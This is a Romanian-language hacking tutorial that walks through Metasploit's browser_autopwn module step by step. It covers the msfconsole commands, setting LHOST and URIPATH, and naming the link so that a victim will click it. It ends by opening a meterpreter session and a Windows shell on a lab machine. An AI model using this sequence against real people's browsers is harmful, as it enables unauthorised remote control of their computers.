Bine ați revenit, dragii mei greenhorn hackers!
În această serie continuă dedicată cunoștințelor de bază în Metasploit, o să aruncăm o privire asupra unui modul pe care mulți hackeri aspiranți îl consideră util – mai exact, autopwn.
În general, atunci când încercăm să hack-uim pe cineva, vrem să știm cât mai multe detalii despre țintă, prin recunoaștere. Apoi, și numai atunci, putem alege exploit-ul adecvat. Ar trebui să cunoaștem sistemul de operare, aplicațiile, browserul, versiunea Java, Flash etc. Este o muncă obositoare, dar necesară. Trebuie să fim pregătiți să utilizăm un alt exploit, un exploit Java, spre exemplu, atunci când un exploit Flash nu funcționează.
Frumusețea autopwn constă în faptul că ne eliberează de o parte din munca dificilă a recunoașterii. Autopwn va încerca mai întâi să scaneze amprentele browserului victimei, apoi ,,aruncă” către acesta orice exploit crede că ar putea funcționa. Ne face viața destul de simplă. Dezavantajul autopwn îl reprezintă faptul că este foarte ,,zgomotos” și poate duce fie la detectarea lui de către ținta noastră, fie duce la blocarea browserului, ceea ce se întâmplă des.
Să aruncăm o mică privire la acesta.
Pasul 1: Pornim Kali și deschidem Metasploit
Să pornim Kali și să deschidem Metasploit cu următoarea comandă:
msfconsole
Pasul 2: Utilizăm Autopwn
Pentru a folosi orice exploit, începem în general cu comanda de utilizare (use). Deoarece modulul autopwn se găsește în auxiliary/server/browser_autopwn, îl vom porni prin următoarea comandă:
msf> use auxiliary/server/browser_autopwn
Această comandă va încărca modulul. Apoi, pentru a obține mai multe informații despre acest modul, tastăm:
msf > auxiliary(browser_autopwn) > info
După cum puteți vedea în capturile de ecran de mai sus și de mai jos, acest lucru ne oferă toate informațiile de care avem nevoie pentru a începe, inclusiv informații pentru fiecare dintre opțiuni și o scurtă descriere a modulului.
Pasul 3: Afișăm și setăm opțiunile
La fel ca la aproape toate modulele Metasploit, trebuie să îi cerem să ne arate opțiunile.
msf > show options
După cum putem vedea, trebuie să setăm:
- LHOST
- URIPATH
LHOST este localhost-ul. Cu alte cuvinte, sistemul nostru de atac Kali. Din moment ce al meu este la 192.168,100.3, tastez:
msf > set LHOST 192.168.100.3
Acum trebuie să creăm un URIPATH. Acesta este adresa URL la care dorim ca exploit-urile să fie amplasate pe serverul nostru rău intenționat. Îl putem denumi oricum dorim sau l-am putea lăsa necompletat și Metasploit îi va seta un nume implicit. Deoarece va trebui să atragem victima să dea click pe acest link, o să-l facem să aibă numele site-ului nostru preferat dedicat hacking-ului, adică BlackWeb. 🙂
msf > set URIPATH blackweb
Pentru a începe, asta este tot ceea ce trebuie să setăm.
Pasul 4: Exploit
În cele din urmă, tastăm:
msf > exploit
Aceasta va porni modulul autopwn. Pornește numeroase servere și apoi încarcă exploit-urile care pot funcționa împotriva acelui browser. Fiecare dintre ele reprezintă o altă vulnerabilitate posibilă în browserul nostru. Fiți răbdători deoarece durează puțin.
Observați în mijlocul ecranului de mai sus că am încărcat 20 de module de exploatare.
Pasul 5: Căutăm pe server
Acum, de pe un sistem Windows 7 cu Internet Explorer 9, când țintă navighează la serverul nostru web de la adresa 192.168.100.3:8080/blackweb, va primi acest avertisment de la IE:
Am încercat și cu Mozilla, desigur:
Înapoi pe sistemul nostru Kali, autopwn copiază amprenta browserului și încercă să determine care dintre exploit-uri va funcționa.
Observăm în mijlocul acestei capturi de ecran că autopwn ,,răspunde cu 9 exploit-uri”. Acum va începe să încerce fiecare dintre aceste exploit-uri împotriva browser-ului, cu speranța că cel puțin unul va funcționa.
Pasul 6: Verificăm sesiunile
În cele din urmă, revenim la sistemul nostru Kali și vedem dacă sesiunile au fost deschise tastând:
sessions -l
Când vom face asta, Metasploit va lista toate sesiunile noastre active. Se pare că avem doar unul.
Pentru a ne conecta la sesiunea respectivă, introducem pur și simplu:
sessions -i 1
1 este ID-ul sesiunii noastre din comanda precedentă (O vedem în coloana din stânga sus). Aceasta se va conecta apoi la conexiunea mea meterpreter care arată astfel:
meterpreter >
Aceasta este conexiunea directă cu mașina pe care este instalat Windows 7. Când scriem:
meterpreter > shell
Aceasta mă ,,transpune” într-un command prompt Windows, precum cel de mai jos:
În funcție de browser și de configurația acestuia, putem obține mai multe sesiuni meterpreter. Putem obține una, sau nici măcar una, depinde foarte mult și de noroc. În cel mai rău caz, toate exploit-urile care rulează pot prăbuși browser-ul.
Deși autopwn este un instrument Metasploit bunicel, acesta este mai puțin ,,silențios” și de cele mai multe ori va copleși browser-ul din cauza exploit-urilor și ar putea să-l prăbușească.
Cam atât cu acest tutorial. Nu uitați să reveniți pentru mai multe ghiduri. Dacă aveți nelămuriri, secțiunea comentarii vă stă la dispoziție.
Până data viitoare, să ne citim cu bine! 🙂